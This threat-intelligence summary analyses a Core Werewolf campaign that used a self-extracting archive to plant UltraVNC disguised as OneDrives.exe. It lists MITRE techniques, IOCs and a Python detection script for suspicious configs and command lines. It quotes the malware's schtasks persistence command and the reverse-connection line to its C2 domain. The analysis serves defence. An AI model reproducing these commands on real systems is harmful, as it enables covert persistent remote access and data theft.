Cyber spies from Core Werewolf tried to attack a Russian military base in Armenia

FACCT analysts identified a self-extracting 7zSFX archive (7ZSfxMod_x86.exe) that unpacks an obfuscated batch, a decoy PDF, an UltraVNC config and a disguised UltraVNC executable into %TEMP% and then executes them to establish remote access. The implant uses scheduled tasks and OneDrives.exe (UltraVNC) with parameters to autoreconnect to mailcommunity[.]ru:443; the activity is attributed to the Core Werewolf group. #CoreWerewolf #UltraVNC

Keypoints

  • FACCT found a PE32 self-extracting 7zSFX archive (7ZSfxMod_x86.exe) that extracts to %TEMP% and runs an obfuscated batch (5951402583331559.cmd).
  • The archive contains a decoy PDF (perevod.pdf), an UltraVNC executable renamed OneDrives.exe, and an UltraVNC.ini configuration file.
  • The batch file copies and opens the decoy PDF, copies the UltraVNC binary and config to %TEMP%, kills any existing OneDrives.exe, and launches the VNC client.
  • Persistence and scheduled execution are achieved by creating multiple Windows Scheduled Tasks that run or kill OneDrives.exe and launch it with connection parameters (-autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443).
  • UltraVNC is configured for remote access (PortNumber=5612, HTTPPortNumber=5800), file transfer enabled, disabled tray icon, and an embedded password in UltraVNC.ini.
  • Attackers used mailcommunity[.]ru:443 as the C2 and deployed additional Go-language droppers with identical UltraVNC configuration and the same C2 address.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The lure opens a decoy PDF to engage the user ('Opening a decoy document to distract the victim's attention: start "" "%CD%\perevod.pdf"').
  • [T1027] Obfuscated Files or Information – The archive executes an obfuscated batch script to hide actions (‘obfuscated Batch file 5951402583331559.cmd’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – The installer runs multiple cmd.exe commands to rename, copy files, change directories and execute the batch (‘cmd.exe /c ren 5951402583331559 5951402583331559.cmd’).
  • [T1053.005] Scheduled Task/Job – Persistence and automated execution are implemented via schtasks to create tasks that run and kill OneDrives.exe ('schtasks /create /f /tn … /tr "%HOMEDRIVE%%HOMEPATH%\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443"').
  • [T1071.001] Application Layer Protocol: Web Protocols – Command-and-control uses HTTPS to the attacker domain (‘-connect mailcommunity[.]ru:443’ and ‘start … -connect mailcommunity[.]ru:443’).
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Attackers disguise UltraVNC as a OneDrive-branded executable and resource icon to blend in (‘OneDrive application icon for hidden remote access’).

Indicators of Compromise

  • [File hash] 7ZSfxMod_x86.exe – MD5: b4644e784d384e419a270c8a44f41dd2, SHA-256: 0de3e1349b12a96a99784c45aebbf88012562545af6ade624e78d0ff2cfd5f35
  • [File hash] OneDrives.exe (UltraVNC) – MD5: d45bdf072094435bbb534b9a0c254af5, SHA-1: e1c24d8bfab674937f498701f8b25d07c56dada0
  • [Domain C2] mailcommunity[.]ru – used as the command-and-control server (connect via :443)
  • [IP address] 185.139.70[.]84 – observed infrastructure associated with the campaign
  • [File paths] Temporary drop locations – %TEMP%\OneDrives.exe, %TEMP%\UltraVNC.ini, %TEMP%\perevod.pdf
  • [Filenames] Batch and decoy – 5951402583331559.cmd, Px69S29l29t79I69v3.ei89I49K79k99b89f2 (perevod.pdf)

The 7zSFX (7ZSfxMod_x86.exe) extracts its payload into %TEMP% and renames/launches an obfuscated batch (5951402583331559.cmd) which reconstructs a decoy PDF, an UltraVNC.ini configuration, and the UltraVNC binary disguised as OneDrives.exe. The archive executes a sequence of command-shell operations (cmd.exe /c ren/copy/cd) to place these files into %USERPROFILE%\AppData\Local\Temp and then runs the batch to continue the setup.

The batch performs the following automated actions: copies and opens the decoy PDF to distract the user, copies the UltraVNC executable to OneDrives.exe, forces termination of any existing OneDrives.exe process, and creates multiple scheduled tasks via schtasks: one to kill OneDrives.exe, one to run OneDrives.exe daily, and another to run it with parameters that cause the client to autoreconnect with a randomized id to the C2. The command used to establish the outbound connection is: OneDrives.exe -autoreconnect -id:%COMPUTERNAME%_%RANDOM% -connect mailcommunity[.]ru:443.

The deployed UltraVNC is a legitimate v1.2.0.5 binary with a custom UltraVNC.ini enabling file transfer, disabling the tray icon, and setting PortNumber=5612 and HTTPPortNumber=5800; a password field is present in the config. FACCT also observed Go-language droppers with identical UltraVNC configuration and the same mailcommunity[.]ru:443 C2, indicating reuse of the VNC client, config and infrastructure across multiple loaders.
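The two artifacts a defender can check for directly are the UltraVNC.ini settings and the schtasks command line described above. The following is an added detection example, not code from FACCT or the Habr article: it assumes UltraVNC.ini uses its standard [admin]/[ultravnc] section and key names, and it runs over constructed sample input rather than real telemetry.

```python
import configparser
import re
# Constructed sample UltraVNC.ini (not real evidence): standard key layout,
# values mirror the settings the report describes.
SAMPLE_INI = """[admin]
FileTransferEnabled=1
DisableTrayIcon=1
PortNumber=5612
[ultravnc]
passwd=0000000000000000
"""

# Constructed command lines: one mirrors the reported schtasks call, two are benign.
SAMPLE_CMDLINES = [
    r'schtasks /create /f /tn "OneDriveSync" /tr "C:\Users\u\AppData\Local\Temp\OneDrives.exe -autoreconnect -id:HOST_4242 -connect mailcommunity[.]ru:443"',
    r'C:\Program Files\Microsoft OneDrive\OneDrive.exe /background',
    r'schtasks /create /f /tn "Cleanup" /tr "C:\Windows\System32\cleanmgr.exe /sagerun:1"',
]

TEMP_DIR = re.compile(r'\\appdata\\local\\temp\\', re.I)
CONNECT = re.compile(r'-connect\s+([\w.\[\]-]+:\d+)', re.I)

def review_ini(text: str) -> list:
    """Flag UltraVNC.ini settings that match the reported configuration."""
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(text)
    admin = cfg['admin'] if cfg.has_section('admin') else {}
    findings = []
    if admin.get('FileTransferEnabled') == '1':
        findings.append('file transfer enabled')
    if admin.get('DisableTrayIcon') == '1':
        findings.append('tray icon hidden from user')
    if admin.get('PortNumber') not in (None, '5900'):  # 5900 is the VNC default
        findings.append(f"non-default listen port {admin['PortNumber']}")
    if cfg.has_section('ultravnc') and cfg['ultravnc'].get('passwd'):
        findings.append('embedded VNC password')
    return findings

def review_cmdline(cmdline: str) -> list:
    """Flag command lines matching the reported schtasks / UltraVNC usage."""
    low = cmdline.lower()
    findings = []
    if 'schtasks' in low and TEMP_DIR.search(cmdline):
        findings.append('scheduled task launching a binary from %TEMP%')
    m = CONNECT.search(cmdline)
    if m and '-autoreconnect' in low:
        findings.append(f'UltraVNC reverse connection to {m.group(1)}')
    if re.search(r'\\onedrives\.exe\b', cmdline, re.I):
        findings.append('OneDrive look-alike name OneDrives.exe')
    return findings
```

Feed review_cmdline process-creation command lines (e.g. Sysmon event ID 1 or Security 4688) and review_ini any UltraVNC.ini found in user-writable paths; the genuine OneDrive.exe and a schtasks call into System32 produce no findings.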

Read more: https://habr.com/ru/companies/f_a_c_c_t/articles/808143